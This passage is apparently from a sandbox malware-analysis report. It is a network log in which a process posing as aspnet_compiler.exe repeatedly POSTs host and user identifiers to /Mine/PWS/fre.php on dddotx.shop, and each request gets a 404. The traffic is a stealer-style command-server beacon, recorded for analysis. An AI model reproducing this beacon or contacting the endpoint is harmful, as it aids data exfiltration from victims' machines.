                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  116192.168.2.455992188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:26.995888948 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:27.001128912 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:27.737901926 CEST577INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kI1XESc1wi8jPwRyP84%2FaTmUd%2Fj7GN7vfKV2xCgFs85v5esFnqPZw%2FpB8wNPeWCaP%2FYIVHWNe1THZTA%2FH%2BoHB0ocOXN%2Bsxbrdu7eT9Pf41YbYhiXw9H4%2BlYZz0kGDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e714c047d0b-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  117192.168.2.455993188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:27.894305944 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:27.899264097 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:28.608217955 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3iKez7FxuroCVNRX6FaGNYn9oxH1uAVRcioJs1Dlbfb3QomUEts1S9ZDtFM01tQzQ6RPrjFUnXwVQ7E4NguSVGbjA9yUUHqWslbrVQ68shPtKXISPA6s%2F6X7EOAYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e76ff5578ed-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  118192.168.2.455994188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:28.748756886 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:28.753856897 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:29.440074921 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wbloxdmDJNXRmk9OyVX9iQ%2FEtYsxAY2utKgVavgzCu9SfgETva8mLu1zcbJBw%2BSCPJjafTp36Ck7KxHQbGYgOuve7gt0YsCDh442%2B20leZLDCWZjv6LSaoLeB%2FWJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e7c2cda1799-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  119192.168.2.455995188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:29.609441042 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:29.618077993 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:30.271070004 CEST561INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hodOlnVk3u1i1qXWzCSAoHFe56cWXGQa3ddr2hNSB9aqGO1fXwZJ5FOriLIiCmKKZx5bjdgi3QtpNOuE8M8AaEYRM8MHxr3ryNVmcDWktmim70Ctfnp0ExIaFkvmxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e8188c91a13-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  120192.168.2.455996188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:30.423810005 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:30.428677082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:31.121346951 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltEvnr7FeL1qfB82ayyIpGcfjt9099syS7SswFV3e9JoF2NuOSJY6JpGv2W2jp8EJvYIDr%2BQkGa4v1syw6jabknAS%2FGMY%2FYjLVXB376bq67TV%2FoZ%2FmHdTgJvtVSKOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e86bf1d42b0-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  121192.168.2.455997188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:31.267951965 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:31.273027897 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:31.982772112 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WU21y9%2BryG%2FXStViqGpAf3iblzWtvONAx47m5C4CO%2FYu938%2FlOUH8Bxr7EJwRngQIZQVOeRgjxe3UHLBPVG%2F83oO8LBoWE6d00sZJENB%2BcPYweGZDEOAHrp5YoZrlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e8c0f638c5f-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  122192.168.2.455998188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:32.128866911 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:32.135559082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:32.891236067 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLGSQL5A8e8gHtquLdZ7r%2Fv2r6h4w%2BMqBDqSXvsCPi4FkDYzRWCgCyG2XeHXeQ%2Bf923k4v%2F9hTXlLfrJlCZ4B5nH01E%2BL1b8UEW1q70RmHyCkz3LqrwSrfaOW73Q5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e919b83c341-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  123192.168.2.455999188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:33.250965118 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:33.256021976 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:33.916858912 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZg7h6ySacjJ75kQbxcFnVBDLTVkZdsvr0qlI4GzH%2BBVBFyv1wrh9LCUgVjpwUEjyL9ByW1WnJhb0fhRYG2VvCrrAjXvcm%2B3P4j0q0Xgl%2Fg4tznO%2BpKYlT%2F6UTBwXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e983b980ca0-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  124192.168.2.456000188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:34.068444014 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:34.073487997 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:35.635847092 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e9d9d415e82-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:30:35.637883902 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e9d9d415e82-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:30:35.638684988 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e9d9d415e82-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  125192.168.2.456001188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:35.796345949 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:35.801198006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:36.512485981 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Wc9BoQ2cdOOUz9pULeesDopHaLV2YsoAss%2BRpNsV9XeGVgAZszBw9X4envSXhECfsr9Clm5p4LzfDXdaB6UHvAiFvfB6ahf1EB92EHDQ%2FkzLDjxAuYRN6j7p67%2F6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ea84db18c15-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  126192.168.2.456002188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:37.765178919 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:37.771542072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:38.532172918 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpkspz6Y7C9CA5kg8Ib7X1Dl4El6GK1wiB6QUyMxjiOkWktD%2FdbmTLnYGMa0EA9fRx5Go8WqBZA5sE0xWBk97H9PqekxhWo8bfE%2F8SmEWFN8oe3EC7%2B2K6e4riM%2FHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5eb48d1119db-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  127192.168.2.456003188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:38.703809977 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:38.713861942 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:39.444228888 CEST577INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wLxYX05jqFpNoYU2cVY48f%2FkC1uY7%2B4l03%2FLR6M0HLtrJYCqSvwE6VR%2FDQZSapg5W01P6lhDJcScE996oUNCiWHKwfdHcsv9WzisfE%2BRtN%2FS4JBVP%2BXxT%2BW6EgRwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5eba7cbf438c-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  128192.168.2.456004188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:39.589740038 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:39.594556093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:40.283212900 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0SdfyeaGArd9vXPBT1vRE92Sn%2F6Abpe9kDzekg14vuiOsKKX2pRbyg5kch1SYBfEWwFMXzHOI2VUOXNRVpuFLSIyYpctWsDFCffpweFs5ORAiQGZwhx36AR0%2BHLXpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ec019be4245-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  129192.168.2.456005188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:40.427402973 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:40.433960915 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:41.170823097 CEST575INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
